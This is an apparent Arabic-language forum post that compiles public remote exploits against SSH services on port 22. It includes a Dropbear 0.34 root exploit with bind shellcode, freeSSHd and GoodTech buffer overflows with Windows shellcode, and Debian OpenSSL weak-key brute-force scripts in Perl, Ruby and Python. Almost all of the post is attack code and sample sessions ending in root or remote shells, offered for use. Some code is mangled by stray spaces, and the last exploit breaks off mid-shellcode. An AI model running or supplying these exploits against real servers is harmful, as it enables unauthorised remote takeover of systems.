اخلاقي تاج راسي
08-25-2013, 02:00 PM
بسم الله الرحمن الرحيم
السلام عليكم و رحمة الله و بركاته
إن شاء الله تكونو في افضل حال
بين ايدينا الان 3 بورتات :
بورت 22 و بورت 23 وبورت 25 وطرحنا مسبقاً بورت 21 و الان تبقىآ لدينا 100 بورت .
نقول بسم الله الرحمن الرحيم
نبداء بـ بورت 22
22 Dropbear SSH <= 0.34 Remote Root Exploit
/*
* Linux x86 Dropbear SSH <= 0.34 remote root exploit
* coded by live
*
* You'll need a hacked ssh client to try this out. I included a patch
* to openssh-3.6.p1 somewhere below this comment.
*
* The point is: the buffer being exploited is too small(25 bytes) to hold our
* shellcode, so a workaround was needed in order to send it. What I did here
* was to hack the ssh client so that it sends the local environment variable
* SHELLCODE as ssh's methodname string. This method was described by Joel
* Eriksson @ 0xbadc0ded.org.
*
* The 25 bytes limitation is also the reason for the the strange ``2 byte''
* retaddr you will see here. That's not enough for complete pointer overwrite,
* so I decided to overwrite 3rd and 2nd bytes and hope our shellcode is
* around ;)
*
* % telnet localhost 22
* Trying 127.0.0.1...
* Connected to localhost.
* Escape character is '^]'.
* SSH-2.0-dropbear_0.34
* ^]
* telnet> quit
* Connection closed.
*
* % objdump -R /usr/local/sbin/dropbear| grep malloc
* 080673bc R_386_JUMP_SLOT malloc
*
* % drop-root -v24 localhost
* ?.2022u%24$hn@localhost's password:
* Connection closed by 127.0.0.1
*
* % telnet localhost 10275
* Trying 127.0.0.1...
* Connected to localhost.
* Escape character is '^]'.
* id; exit;
* uid=0(root) gid=0(root) groups=0(root)
* Connection closed by foreign host.
*
* In the above example we were able to lookup a suitable .got entry(used as
* retloc here), but this may not be true under a hostile environment. If
* exploiting this remotely I feel like chances would be greater if we attack
* the stack, but that's just a guess.
*
* Version pad is 24 to 0.34, 12 to 0.32. I don't know about other versions.
*
* gr33tz: ppro, alcaloide and friends.
*
* 21.08.2003
* Please do not distribute
*/
/*
--- sshconnect2.c2003-08-21 21:34:03.000000000 -0300
+++ sshconnect2.c.hack2003-08-21 21:33:47.000000000 -0300
@@ -278,6 +278,8 @@
void
userauth(Authctxt *authctxt, char *authlist)
{
+ char *shellcode = getenv("SHELLCODE");
+
if (authlist == NULL) {
authlist = authctxt->authlist;
} else {
@@ -290,6 +292,7 @@
if (method == NULL)
fatal("Permission denied (%s).", authlist);
authctxt->method = method;
+ authctxt->method->name = shellcode;
if (method->userauth(authctxt) != 0) {
debug2("we sent a %s packet, wait for reply", method->name);
break;
*/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#define SSH_PATH "ssh"
#define SSH_PORT "22"
#define DEFAULT_VERSION_PAD 24
#define DEFAULT_RETLOC 0xbffff800
#define DEFAULT_RETADDR 0x080e /* 2 byte retaddr, not enough space for a
* full overwrite. */
/* fork/bind shellcode by live
* default port is 10275
*
* I believe this can be futher optmized, but size is not
* an issue here since we are sending the shellcode through
* a ssh variable which is about 30k bytes long.
*/
char shellcode[] =
"x31xc0" /* xor %eax,%eax */
"xb0x02" /* mov $0x2,%al */
"xcdx80" /* int $0x80 */
"x85xc0" /* test %eax,%eax */
"x75x54" /* jne 5e */
"xebx50" /* jmp 5c */
"x5e" /* pop %esi */
"x31xc0" /* xor %eax,%eax */
"x31xdb" /* xor %ebx,%ebx */
"x89x46x08" /* mov %eax,0x8(%esi) */
"xb0x02" /* mov $0x2,%al */
"x89x06" /* mov %eax,(%esi) */
"xfexc8" /* dec %al */
"x89x46x04" /* mov %eax,0x4(%esi) */
"xb0x66" /* mov $0x66,%al */
"xfexc3" /* inc %bl */
"x89xf1" /* mov %esi,%ecx */
"xcdx80" /* int $0x80 */
"x89x06" /* mov %eax,(%esi) */
"x89x4ex04" /* mov %ecx,0x4(%esi) */
"x80x46x04x0c" /* addb $0xc,0x4(%esi) */
"x31xc0" /* xor %eax,%eax */
"xb0x10" /* mov $0x10,%al */
"x89x46x08" /* mov %eax,0x8(%esi) */
"xb0x02" /* mov $0x2,%al */
"x66x89x46x0c" /* mov %ax,0xc(%esi) */
"x66xb8x28x23" /* mov $0x2328,%ax */
"x89x46x0e" /* mov %eax,0xe(%esi) */
"x31xc0" /* xor %eax,%eax */
"x89x46x10" /* mov %eax,0x10(%esi) */
"xb0x66" /* mov $0x66,%al */
"xfexc3" /* inc %bl */
"xcdx80" /* int $0x80 */
"xfexcb" /* dec %bl */
"x89x5ex04" /* mov %ebx,0x4(%esi) */
"x31xc0" /* xor %eax,%eax */
"xb0x66" /* mov $0x66,%al */
"xb3x04" /* mov $0x4,%bl */
"xcdx80" /* int $0x80 */
"xebx04" /* jmp 60 */
"xebx44" /* jmp a2 */
"xebx3a" /* jmp 9a */
"x31xc0" /* xor %eax,%eax */
"x89x46x04" /* mov %eax,0x4(%esi) */
"x89x46x08" /* mov %eax,0x8(%esi) */
"xb0x66" /* mov $0x66,%al */
"xfexc3" /* inc %bl */
"xcdx80" /* int $0x80 */
"x31xc9" /* xor %ecx,%ecx */
"x89xc3" /* mov %eax,%ebx */
"x31xc0" /* xor %eax,%eax */
"xb0x3f" /* mov $0x3f,%al */
"xcdx80" /* int $0x80 */
"xfexc1" /* inc %cl */
"x80xf9x03" /* cmp $0x3,%cl */
"x75xf3" /* jne 72 */
"x68x2fx2fx73x68" /* push $0x68732f2f */
"x68x2fx62x69x6e" /* push $0x6e69622f */
"x89xe3" /* mov %esp,%ebx */
"x31xc0" /* xor %eax,%eax */
"x88x43x08" /* mov %al,0x8(%ebx) */
"x50" /* push %eax */
"x53" /* push %ebx */
"x89xe1" /* mov %esp,%ecx */
"x89xe2" /* mov %esp,%edx */
"xb0x0b" /* mov $0xb,%al */
"xcdx80" /* int $0x80 */
"x31xc0" /* xor %eax,%eax */
"x31xdb" /* xor %ebx,%ebx */
"xfexc0" /* inc %al */
"xcdx80" /* int $0x80 */
"xe8x65xffxffxff" /* call c <up> */
;
static void usage(const char *progname);
int
main(int argc, char *argv[])
{
char buffer[29500], fmt[26], *target;
long int retloc, retaddr;
int ch, version_pad;
retloc = DEFAULT_RETLOC +1;
retaddr = DEFAULT_RETADDR -40;
version_pad = DEFAULT_VERSION_PAD;
while ( (ch = getopt(argc, argv, "l:r:v:")) != -1) {
switch (ch) {
case 'l':
retloc += atoi(optarg) *4;
break;
case 'r':
retaddr += atoi(optarg) *4;
break;
case 'v':
version_pad = atoi(optarg);
break;
}
}
if (argc -optind != 1) {
usage(argv[0]);
exit(-1);
}
argc -= optind;
argv += optind;
target = argv[0];
memset(buffer, 0x90, 29500);
memcpy(buffer +29500 -strlen(shellcode), shellcode, strlen(shellcode));
memcpy(buffer, "SHELLCODE=", 10);
putenv(buffer);
snprintf(fmt, sizeof fmt, "%c%c%c%c%%.%du%%%d$hn",
(retloc & 0xff),
(retloc & 0xff00) >> 8,
(retloc & 0xff0000) >> 16,
(retloc & 0xff000000) >> 24,
retaddr,
version_pad);
execl(SSH_PATH, "ssh", "-l", fmt, "-p", SSH_PORT, target, NULL);
exit(0);
}
static void
usage(const char *progname) {
fprintf(stderr, "Linux x86 Dropbear SSH <= 0.34 remote root exploitn");
fprintf(stderr, "coded by livenn");
fprintf(stderr, "Usage: %s [-l <retloc offset>] [-r <retaddr offset>]"
" [-v <version pad>] <target>n", progname);
}
// [2004-08-09]
22 freeSSHd <= 1.0.9 Key Exchange Algorithm Buffer Overflow Exploit
#!/usr/bin/env python
"""
Coded by Tauqeer Ahmad a.k.a 0x-Scientist-x0
ahmadtauqeer[at]yahoo.com
Disclaimer: This Proof of concept exploit is for educational purpose only.
Please do not use it against any system without prior permission.
You are responsible for yourself for what you do with this code.
Greetings: All the Pakistani White Hats including me ;)
Flames: To all the skript kiddies out there. Man grow up!.
Code tasted against freeSSHd version 1.0.9
If you didn't get shell at first try, try few times and you will get lucky
Advisories:
http://www.securityfocus.com/bid/17958
http://www.frsirt.com/english/advisories/2006/1786
"""
import socket
import getopt
import sys
host = "192.168.0.2"
port = 0
eip =""
#/* win32_bind - EXITFUNC=thread LPORT=1977 Size=317 Encoder=None http://metasploit.com */
shellcode = "\xfc\x6a\xeb\x4d\xe8\xf9\xff\xff\xff\x60\x8b\x6c\x 24\x24\x8b\x45" \
"\x3c\x8b\x7c\x05\x78\x01\xef\x8b\x4f\x18\x8b\x5f\x 20\x01\xeb\x49" \
"\x8b\x34\x8b\x01\xee\x31\xc0\x99\xac\x84\xc0\x74\x 07\xc1\xca\x0d" \
"\x01\xc2\xeb\xf4\x3b\x54\x24\x28\x75\xe5\x8b\x5f\x 24\x01\xeb\x66" \
"\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb\x03\x2c\x8b\x89\x 6c\x24\x1c\x61" \
"\xc3\x31\xdb\x64\x8b\x43\x30\x8b\x40\x0c\x8b\x70\x 1c\xad\x8b\x40" \
"\x08\x5e\x68\x8e\x4e\x0e\xec\x50\xff\xd6\x66\x53\x 66\x68\x33\x32" \
"\x68\x77\x73\x32\x5f\x54\xff\xd0\x68\xcb\xed\xfc\x 3b\x50\xff\xd6" \
"\x5f\x89\xe5\x66\x81\xed\x08\x02\x55\x6a\x02\xff\x d0\x68\xd9\x09" \
"\xf5\xad\x57\xff\xd6\x53\x53\x53\x53\x53\x43\x53\x 43\x53\xff\xd0" \
"\x66\x68\x07\xb9\x66\x53\x89\xe1\x95\x68\xa4\x1a\x 70\xc7\x57\xff" \
"\xd6\x6a\x10\x51\x55\xff\xd0\x68\xa4\xad\x2e\xe9\x 57\xff\xd6\x53" \
"\x55\xff\xd0\x68\xe5\x49\x86\x49\x57\xff\xd6\x50\x 54\x54\x55\xff" \
"\xd0\x93\x68\xe7\x79\xc6\x79\x57\xff\xd6\x55\xff\x d0\x66\x6a\x64" \
"\x66\x68\x63\x6d\x89\xe5\x6a\x50\x59\x29\xcc\x89\x e7\x6a\x44\x89" \
"\xe2\x31\xc0\xf3\xaa\xfe\x42\x2d\xfe\x42\x2c\x93\x 8d\x7a\x38\xab" \
"\xab\xab\x68\x72\xfe\xb3\x16\xff\x75\x44\xff\xd6\x 5b\x57\x52\x51" \
"\x51\x51\x6a\x01\x51\x51\x55\x51\xff\xd0\x68\xad\x d9\x05\xce\x53" \
"\xff\xd6\x6a\xff\xff\x37\xff\xd0\x8b\x57\xfc\x83\x c4\x64\xff\xd6" \
"\x52\xff\xd0\x68\xef\xce\xe0\x60\x53\xff\xd6\xff\x d0"
def exploit():
buff = "\x53\x53\x48\x2d\x31\x2e\x39\x39\x2d\x4f\x70\x65\x 6e\x53\x53\x48" \
"\x5f\x33\x2e\x34\x0a\x00\x00\x4f\x04\x05\x14\x00\x 00\x00\x00\x00" \
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x 00\x07\xde"
buff = buff + "A" * 1055
buff = buff + eip
buff = buff + "yyyy"
buff = buff + "\x90" * 4
buff = buff + shellcode
buff = buff + "B" * 19021 + "\r\n"
sock = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
sock.connect((host, port))
print "+ Recive reply from server: " + sock.recv(1000)
sock.send(buff)
print "+ SSHD exploited. Now telnet to port 1977 to get shell "
print "+ if you didnt get shell in first try.Try again until you success"
sock.close()
sock = None
def usage():
print "#############################################"
print "# CODED BY TAUQEER AHMAD #"
print "# Scientist #"
print "#############################################"
print "\n"
print "Usage: %s -h <hostip> -p <port> -o <OS>" % sys.argv[0]
print "Following OS supported\n"
print "1 Window XP SP1"
print "2 Window XP SP2"
print "3 Windows 2000 Advanced Server"
if __name__ == '__main__':
if len(sys.argv) < 7:
usage()
sys.exit()
try:
options = getopt.getopt(sys.argv[1:], 'h:p:o:')[0]
except getopt.GetoptError, err:
print err
usage()
sys.exit()
for option, value in options:
if option == '-h':
host = value
if option == '-p':
port = int(value)
if option == '-o':
if value == '1':
eip = "\xFC\x18\xD7\x77" # 77D718FC JMP ESP IN USER32.dll (Windows Xp professional SP1)
elif value == '2':
eip = "\x0A\xAF\xD8\x77" # 77D8AF0A JMP ESP IN USER32.DLL (Windows Xp professional SP2)
elif value == '3':
eip = "\x4D\x3F\xE3\x77" # 77E33F4D JMP ESP IN USER32.DLL (windows 2000 advanced server)
elif value == '4:
eip = "\x29\x4c\xE1\x77" # 77E14c29 JMP ESP IN USER32.DLL (windows 2000 Prof. SP4)
else:
usage()
sys.exit()
exploit()
# [2006-05-15]
22 Debian OpenSSL Predictable PRNG Bruteforce SSH Exploit
the debian openssl issue leads that there are only 65.536 possible ssh
keys generated, cause the only entropy is the pid of the process
generating the key.
This leads to that the following perl script can be used with the
precalculated ssh keys to brute force the ssh login. It works if such a
keys is installed on a non-patched debian or any other system manual
configured to.
On an unpatched system, which doesn't need to be debian, do the following:
keys provided by HD Moore - http://metasploit.com/users/hdm/tools/debian-openssl/
1. Download http://sugar.metasploit.com/debian_ssh_rsa_2048_x86.tar.bz2
http://enigmagroup.org/sploits/debian_ssh_rsa_2048_x86.tar.bz2
2. Extract it to a directory
3. Enter into the /root/.ssh/authorized_keys a SSH RSA key with 2048
Bits, generated on an upatched debian (this is the key this exploit will
break)
4. Run the perl script and give it the location to where you extracted
the bzip2 mentioned.
#!/usr/bin/perl
my $keysPerConnect = 6;
unless ($ARGV[1]) {
print "Syntax : ./exploiter.pl pathToSSHPrivateKeys SSHhostToTry\n";
print "Example: ./exploiter.pl /root/keys/ 127.0.0.1\n";
print "By [email protected]\n";
exit 0;
}
chdir($ARGV[0]);
opendir(A, $ARGV[0]) || die("opendir");
while ($_ = readdir(A)) {
chomp;
next unless m,^\d+$,;
push(@a, $_);
if (scalar(@a) > $keysPerConnect) {
system("echo ".join(" ", @a)."; ssh -l root ".join(" ", map { "-i
".$_ } @a)." ".$ARGV[1]);
@a = ();
}
}
5. Enjoy the shell after some minutes (less than 20 minutes)
Regards,
Markus Mueller
[email protected]
# [2008-05-15]
22 Debian OpenSSL Predictable PRNG Bruteforce SSH Exploit (ruby)
#!/usr/bin/ruby
#
# Debian SSH Key Tester
# L4teral <l4teral [at] gmail com>
#
# This tool helps to find user accounts with weak SSH keys
# that should be regenerated with an unaffected version
# of openssl.
#
# You will need the precalculated keys provided by HD Moore
# See http://metasploit.com/users/hdm/tools/debian-openssl/
# for further information.
#
# Usage:
# debian_openssh_key_test.rb <host> <user> <keydir>
#
require 'thread'
THREADCOUNT = 10
KEYSPERCONNECT = 3
queue = Queue.new
threads = []
keyfiles = []
host = ARGV.shift or raise "no host given!"
user = ARGV.shift or raise "no user given!"
keysdir = ARGV.shift or raise "no key dir given!"
Dir.new(keysdir).each do |f|
if f =~ /\d+$/ then
keyfiles << f
queue << f
end
end
totalkeys = queue.length
currentkey = 1
THREADCOUNT.times do |i|
threads << Thread.new(i) do |j|
while !queue.empty?
keys = []
KEYSPERCONNECT.times { keys << queue.pop unless queue.empty? }
keys.map! { |f| f = File.join(keysdir, f) }
keys.each do |k|
puts "testing key #{currentkey}/#{totalkeys} #{k}..."
currentkey += 1
end
system "ssh -l #{user} -o PasswordAuthentication=no -i #{keys.join(" -i ")} #{host} \"exit\" &>/dev/null"
if $? == 0 then
keys.each do |k|
system "ssh -l #{user} -o PasswordAuthentication=no -i #{k} #{host} \"exit\" &>/dev/null"
if $? == 0 then
puts "KEYFILE FOUND: \n#{k}"
exit
end
end
end
end
end
end
trap("SIGINT") do
threads.each { |t| t.exit() }
exit
end
threads.each { |t| t.join }
# \[2008-05-16]
22 Debian OpenSSL Predictable PRNG Bruteforce SSH Exploit (Python)
#!/bin/python
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston,
# MA 02110-1301, USA.
################################################## ##########################
# Autor: hitz - WarCat team (warcat.no-ip.org)
# Collaborator: pretoriano
#
# 1. Download http://sugar.metasploit.com/debian_ssh_rsa_2048_x86.tar.bz2
# http://enigmagroup.org/sploits/debian_ssh_rsa_2048_x86.tar.bz2
#
# 2. Extract it to a directory
#
# 3. Execute the python script
# - something like: python exploit.py /home/hitz/keys 192.168.1.240 root 22 5
# - execute: python exploit.py (without parameters) to display the help
# - if the key is found, the script shows something like that:
# Key Found in file: ba7a6b3be3dac7dcd359w20b4afd5143-1121
# Execute: ssh -lroot -p22 -i /home/hitz/keys/ba7a6b3be3dac7dcd359w20b4afd5143-1121 192.168.1.240
################################################## ##########################
import Queue
import os
import string
import time
from threading import Thread
import sys
#This class only has a boolean, which will be True if some thread find the key
class End():
def __init__(self):
self.end = False
def Finish(self):
self.end = True
def GetEnd(self):
return self.end
#This is the thread class
class Connection(Thread):
def __init__(self,QueueDir,TheEnd,dir,host,user,port=' 22'):
Thread.__init__(self)
self.QueueDir = QueueDir
self.TheEnd = TheEnd
self.dir = dir
self.host = host
self.user = user
self.port = port
def run(self):
while (not self.TheEnd.GetEnd()) and (not self.QueueDir.empty()):
key = self.QueueDir.get()
cmd = 'ssh -l ' + self.user
cmd = cmd + ' -p ' + self.port
cmd = cmd + ' -o PasswordAuthentication=no'
cmd = cmd + ' -i ' + self.dir + '/' + key
cmd = cmd + ' ' + self.host + ' exit; echo $?'
pin,pout,perr = os.popen3(cmd, 'r')
pin.close()
#To debug descoment the next line. This will show the errors reported by ssh
#print perr.read()
if pout.read().lstrip().rstrip() == '0':
self.TheEnd.Finish()
print ''
print 'Key Found in file: '+ key
print 'Execute: ssh -l%s -p%s -i %s/%s %s' %(self.user,self.port,self.dir,key,self.host)
print ''
print '\n-OpenSSL Debian exploit- by ||WarCat team|| warcat.no-ip.org'
if len(sys.argv) < 4:
print './exploit.py <dir> <host> <user> [[port] [threads]]'
print ' <dir>: Path to SSH privatekeys (ex. /home/john/keys) without final slash'
print ' <host>: The victim host'
print ' <user>: The user of the victim host'
print ' [port]: The SSH port of the victim host (default 22)'
print ' [threads]: Number of threads (default 4) Too big numer is bad'
sys.exit(1)
dir = sys.argv[1]
host = sys.argv[2]
user = sys.argv[3]
if len(sys.argv) <= 4:
port='22'
threads=4
else:
if len(sys.argv) <=5:
port=sys.argv[4]
threads = 4
else:
port=sys.argv[4]
threads = sys.argv[5]
ListDir = os.listdir(dir)
QueueDir=Queue.Queue()
TheEnd = End()
for i in range(len(ListDir)):
if ListDir[i].find('.pub') == -1:
QueueDir.put(ListDir[i])
initsize = QueueDir.qsize()
tested = 0
for i in range(0,int(threads)):
Connection(QueueDir,TheEnd,dir,host,user,port).sta rt()
while (not TheEnd.GetEnd()) and (not QueueDir.empty()):
time.sleep(5)
actsize = QueueDir.qsize()
speed = (initsize - tested - actsize)/5
tested = initsize - actsize
print 'Tested %i keys | Remaining %i keys | Aprox. Speed %i/sec' %(tested,actsize,speed)
# [2008-06-01]
22 freeSSHd 1.2.1 (Post Auth) Remote SEH Overflow Exploit
#!/usr/bin/perl
################################################## #############################
# FreeSSHD 1.2.1 (Post Auth) Remote Seh Overflow http://freeddsshd.com/ #
# Exploit based on securfrog Poc http://www.enigmagroup.org/exploits/5709 #
# #
# Coded by Matteo Memelli aka ryujin #
# `Spaghetti & PwnSauce` #
# >> http://www.be4mind.com http://www.gray-world.net << #
# #
# Tested on Windows XPSp2 EN / Windows Vista Ultimate EN #
# Offset for SEH overwrite is 3 Bytes greater in Windows Vista #
# Reliable Exploitation needs SSC :) #
# #
# `I Miss Python but...I Gotta learn some perl too ;)` #
# `Cheers to #offsec friends and to my bro s4tan` #
################################################## #############################
# #
# bt POCS # ./freeSSHD_exploit.pl 10.150.0.228 22 pwnme pwnme 2 #
# [+] FreeSSHD 1.2.1 (Post Auth) Remote Seh Overflow #
# [+] Coded by Matteo Memelli aka ryujin #
# [+] SSC: Stack Spring Cleaning... >> rm thisJunk << #
# [+] Exploiting FreSSHDService... #
# [+] Sending Payload... #
# Done! CTRL-C and check your shell on port 4444 #
# #
# bt POCS # nc 10.150.0.228 4444 #
# Microsoft Windows [Version 6.0.6000] #
# Copyright (c) 2006 Microsoft Corporation. All rights reserved. #
# #
# C:\Users\ryujin\Desktop> #
# #
################################################## #############################
use strict;
use Net::SSH2;
my $numArgs = $#ARGV + 1;
if ($numArgs != 5) {
print "Usage : ./freeSSHD_exploit.pl HOST PORT USER PASS TARGET\n";
print "TARGET: 1 -> XPSP2\n";
print "TARGET: 2 -> VISTA\n";
exit;
}
# Using Msf::Encoder::PexAlphaNum with final size of 709 bytes
# ExitFunc=SEH
my $shellcode =
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x 49\x49\x49\x49".
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x 41\x30\x42\x36".
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x 44\x42\x48\x34".
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x 30\x41\x44\x41".
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x 4c\x46\x4b\x4e".
"\x4d\x54\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x 42\x36\x4b\x48".
"\x4e\x56\x46\x42\x46\x32\x4b\x38\x45\x44\x4e\x33\x 4b\x48\x4e\x47".
"\x45\x50\x4a\x37\x41\x30\x4f\x4e\x4b\x58\x4f\x44\x 4a\x31\x4b\x58".
"\x4f\x55\x42\x52\x41\x30\x4b\x4e\x49\x44\x4b\x48\x 46\x33\x4b\x38".
"\x41\x30\x50\x4e\x41\x53\x42\x4c\x49\x39\x4e\x4a\x 46\x48\x42\x4c".
"\x46\x47\x47\x50\x41\x4c\x4c\x4c\x4d\x50\x41\x30\x 44\x4c\x4b\x4e".
"\x46\x4f\x4b\x33\x46\x55\x46\x32\x4a\x42\x45\x37\x 45\x4e\x4b\x48".
"\x4f\x35\x46\x42\x41\x30\x4b\x4e\x48\x46\x4b\x48\x 4e\x50\x4b\x34".
"\x4b\x48\x4f\x45\x4e\x31\x41\x50\x4b\x4e\x43\x50\x 4e\x42\x4b\x58".
"\x49\x48\x4e\x46\x46\x32\x4e\x41\x41\x36\x43\x4c\x 41\x53\x4b\x4d".
"\x46\x56\x4b\x48\x43\x34\x42\x43\x4b\x58\x42\x44\x 4e\x30\x4b\x48".
"\x42\x37\x4e\x41\x4d\x4a\x4b\x48\x42\x54\x4a\x50\x 50\x45\x4a\x36".
"\x50\x38\x50\x54\x50\x50\x4e\x4e\x42\x45\x4f\x4f\x 48\x4d\x48\x46".
"\x43\x35\x48\x46\x4a\x46\x43\x43\x44\x53\x4a\x46\x 47\x57\x43\x37".
"\x44\x33\x4f\x35\x46\x55\x4f\x4f\x42\x4d\x4a\x46\x 4b\x4c\x4d\x4e".
"\x4e\x4f\x4b\x43\x42\x55\x4f\x4f\x48\x4d\x4f\x55\x 49\x58\x45\x4e".
"\x48\x36\x41\x58\x4d\x4e\x4a\x50\x44\x50\x45\x55\x 4c\x36\x44\x50".
"\x4f\x4f\x42\x4d\x4a\x36\x49\x4d\x49\x30\x45\x4f\x 4d\x4a\x47\x45".
"\x4f\x4f\x48\x4d\x43\x35\x43\x35\x43\x45\x43\x35\x 43\x35\x43\x54".
"\x43\x35\x43\x54\x43\x35\x4f\x4f\x42\x4d\x48\x46\x 4a\x46\x41\x31".
"\x4e\x35\x48\x56\x43\x35\x49\x48\x41\x4e\x45\x39\x 4a\x36\x46\x4a".
"\x4c\x51\x42\x37\x47\x4c\x47\x45\x4f\x4f\x48\x4d\x 4c\x36\x42\x31".
"\x41\x55\x45\x35\x4f\x4f\x42\x4d\x4a\x46\x46\x4a\x 4d\x4a\x50\x32".
"\x49\x4e\x47\x45\x4f\x4f\x48\x4d\x43\x55\x45\x45\x 4f\x4f\x42\x4d".
"\x4a\x56\x45\x4e\x49\x34\x48\x58\x49\x54\x47\x35\x 4f\x4f\x48\x4d".
"\x42\x45\x46\x45\x46\x45\x45\x45\x4f\x4f\x42\x4d\x 43\x59\x4a\x46".
"\x47\x4e\x49\x37\x48\x4c\x49\x37\x47\x35\x4f\x4f\x 48\x4d\x45\x45".
"\x4f\x4f\x42\x4d\x48\x46\x4c\x46\x46\x46\x48\x36\x 4a\x36\x43\x56".
"\x4d\x46\x49\x58\x45\x4e\x4c\x56\x42\x55\x49\x55\x 49\x32\x4e\x4c".
"\x49\x38\x47\x4e\x4c\x46\x46\x34\x49\x38\x44\x4e\x 41\x33\x42\x4c".
"\x43\x4f\x4c\x4a\x50\x4f\x44\x54\x4d\x42\x50\x4f\x 44\x44\x4e\x52".
"\x43\x39\x4d\x58\x4c\x47\x4a\x43\x4b\x4a\x4b\x4a\x 4b\x4a\x4a\x36".
"\x44\x37\x50\x4f\x43\x4b\x48\x51\x4f\x4f\x45\x37\x 46\x54\x4f\x4f".
"\x48\x4d\x4b\x45\x47\x45\x44\x35\x41\x45\x41\x55\x 41\x35\x4c\x46".
"\x41\x50\x41\x35\x41\x35\x45\x35\x41\x55\x4f\x4f\x 42\x4d\x4a\x36".
"\x4d\x4a\x49\x4d\x45\x30\x50\x4c\x43\x35\x4f\x4f\x 48\x4d\x4c\x56".
"\x4f\x4f\x4f\x4f\x47\x53\x4f\x4f\x42\x4d\x4b\x38\x 47\x45\x4e\x4f".
"\x43\x48\x46\x4c\x46\x36\x4f\x4f\x48\x4d\x44\x35\x 4f\x4f\x42\x4d".
"\x4a\x36\x42\x4f\x4c\x38\x46\x30\x4f\x35\x43\x35\x 4f\x4f\x48\x4d".
"\x4f\x4f\x42\x4d\x5a";
my $nops = "\x90"x64;
my $offset1xp = "\x41"x242;
my $offset1vi = "\x41"x226;
my $offset2xp = "\x41"x24;
my $offset2vi = "\x41"x43;
my $ppr = "\xde\x13\x40";
my $jmpsxp = "\xeb\xe1\x90\x90";
my $jmpsvi = "\xeb\xce\x90\x90";
my $jmpn = "\xe9\x23\xfc\xff\xff";
my $ip = $ARGV[0];
my $port = int($ARGV[1]);
my $user = $ARGV[2];
my $pass = $ARGV[3];
my $payload = '';
if ($ARGV[4] == '1')
{
$payload = $nops.$shellcode.$offset1xp.$jmpn.$offset2xp.$jmps xp.$ppr;
}
elsif ($ARGV[4] == '2')
{
$payload = $nops.$shellcode.$offset1vi.$jmpn.$offset2vi.$jmps vi.$ppr;
}
else
{
print "[-] TARGET ERROR!\n";
exit;
}
print "[+] FreeSSHD 1.2.1 (Post Auth) Remote Seh Overflow\n";
print "[+] Coded by Matteo Memelli aka ryujin\n";
print "[+] SSC: Stack Spring Cleaning... >> rm thisJunk <<\n";
# If you start the exploit before any other connection, everything is fine
# otherwise exploit could become less reliable.
# So let's rm some junk before exploiting our app...
for (my $count = 30; $count >= 1; $count--) {
my $ssh2 = Net::SSH2->new();
$ssh2->connect($ip, $port) || die "[-] Connnection Failed!";
$ssh2->auth_password($user,$pass)|| die "Wrong Username or Passwd!";
$ssh2->disconnect();
}
my $ssh2 = Net::SSH2->new();
$ssh2->connect($ip, $port) || die "[-] Connnection Failed!";
$ssh2->auth_password($user,$pass)|| die "Wrong Username or Passwd!";
print "[+] Exploiting FreSSHDService...\n";
print "[+] Sending Payload...\n";
print " Done! CTRL-C and check your shell on port 4444\n";
my $sftp = $ssh2->sftp();
my $bad = $sftp->opendir($payload);
exit;
# [2008-06-06]
22 GoodTech SSH (SSH_FXP_OPEN) Remote Buffer Overflow Exploit
# GoodTech SSH Remote Buffer Overflow Exploit
# Written by r0ut3r - writ3r [at] gmail.com
#
# SSH_FXP_OPEN command contains a buffer oveflow.
#
# All other operations are also vulnerable, opendir, unlink, etc.
#
# 0day for 2 months :)
use Net::SSH2;
my $user = "root";
my $pass = "yahh";
my $ip = "127.0.0.1";
my $port = 22;
my $ssh2 = Net::SSH2->new();
print "[+] Connecting...\n";
$ssh2->connect($ip, $port) || die "[-] Unable to connect!\n";
$ssh2->auth_password($user, $pass) || "[-] Incorrect credentials\n";
print "[+] Sending payload\n";
my $junk = 'A'x164;
my $eip = "\x49\x13\x9c\x7c"; #call esp
my $nops = "\x90"x20;
my $shellcode =
"\x31\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x 81\x73\x13\x33".
"\x2e\x9c\x0e\x83\xeb\xfc\xe2\xf4\xcf\x44\x77\x43\x db\xd7\x63\xf1".
"\xcc\x4e\x17\x62\x17\x0a\x17\x4b\x0f\xa5\xe0\x0b\x 4b\x2f\x73\x85".
"\x7c\x36\x17\x51\x13\x2f\x77\x47\xb8\x1a\x17\x0f\x dd\x1f\x5c\x97".
"\x9f\xaa\x5c\x7a\x34\xef\x56\x03\x32\xec\x77\xfa\x 08\x7a\xb8\x26".
"\x46\xcb\x17\x51\x17\x2f\x77\x68\xb8\x22\xd7\x85\x 6c\x32\x9d\xe5".
"\x30\x02\x17\x87\x5f\x0a\x80\x6f\xf0\x1f\x47\x6a\x b8\x6d\xac\x85".
"\x73\x22\x17\x7e\x2f\x83\x17\x4e\x3b\x70\xf4\x80\x 7d\x20\x70\x5e".
"\xcc\xf8\xfa\x5d\x55\x46\xaf\x3c\x5b\x59\xef\x3c\x 6c\x7a\x63\xde".
"\x5b\xe5\x71\xf2\x08\x7e\x63\xd8\x6c\xa7\x79\x68\x b2\xc3\x94\x0c".
"\x66\x44\x9e\xf1\xe3\x46\x45\x07\xc6\x83\xcb\xf1\x e5\x7d\xcf\x5d".
"\x60\x7d\xdf\x5d\x70\x7d\x63\xde\x55\x46\x8d\x52\x 55\x7d\x15\xef".
